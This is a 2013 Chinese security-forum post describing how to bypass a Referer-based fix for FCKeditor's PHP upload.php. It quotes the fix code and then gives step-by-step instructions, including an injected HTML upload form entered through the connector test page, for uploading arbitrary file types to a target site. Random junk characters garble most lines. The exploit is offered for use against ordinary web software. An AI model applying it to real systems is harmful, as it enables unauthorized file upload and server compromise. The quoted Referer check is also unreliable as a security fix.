找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2276|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
2 y+ Y" d) V7 i4 L6 E网上给出的修复方案是: c4 z  X' K4 r% a. D  M
修复方法,删除FCK编辑器用其他的编辑器) S6 e( h+ v5 k, }) d! u
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件  P9 N7 |/ T7 ~& C

0 m$ L7 k8 A- A$ o5 {require(‘config.php’);
% C+ A6 M$ G, prequire(‘util.php’);
' I! L( n' @# d3 ~4 ^# {4 I的下面添加以下代码—————————–0 @' |  ~* k9 _& q
//防止外部提交) o) A  |, K0 Q2 U' k
function outsidepost()2 i$ w% }1 l6 `# b- H6 l0 l
{
. V* p9 W" K9 z7 x. o5 x% J$servername=$_SERVER['SERVER_NAME'];
. I2 y& X9 _" Y" U' d" K7 D$sub_from=@$_SERVER['HTTP_REFERER'];
% z9 \6 V! F; V$ a/ ~+ l$sub_len=strlen($servername);
: |3 t3 I  q- v! }1 A9 |. Q, O7 f$checkfrom=substr($sub_from,7,$sub_len);7 t0 z' w* f" ]( V1 D
if($checkfrom!=$servername){$ `3 S- A3 s. ]0 }
echo(“you don’t outsidepost!”);
+ M/ {: a8 T  c: K2 [5 B; Y3 Texit;6 G, c0 j2 f+ r3 q! a, n
}
! z/ _! u6 O( @' l  z: W. V1 a}
7 t0 n8 t& `& \* o4 U6 N3 D* u0 Loutsidepost();
9 H) X/ J; f) S* r$ t8 r$ D4 K防止外部提交,但是没有防止内部提交,
% Q' H  H& l; y( C9 ?利用方法:
3 q8 w; b( P5 e0 p0 t2 L1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
0 a( {# b# D* m4 Z6 k2,在Current Folder 框输入
( W7 L! M$ p$ y/ D& [5 P. Y<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>2 P9 z1 t% [0 ~3 A& H3 a+ a
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。3 `4 A, V% C" g% A! Q5 Y. N4 T
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表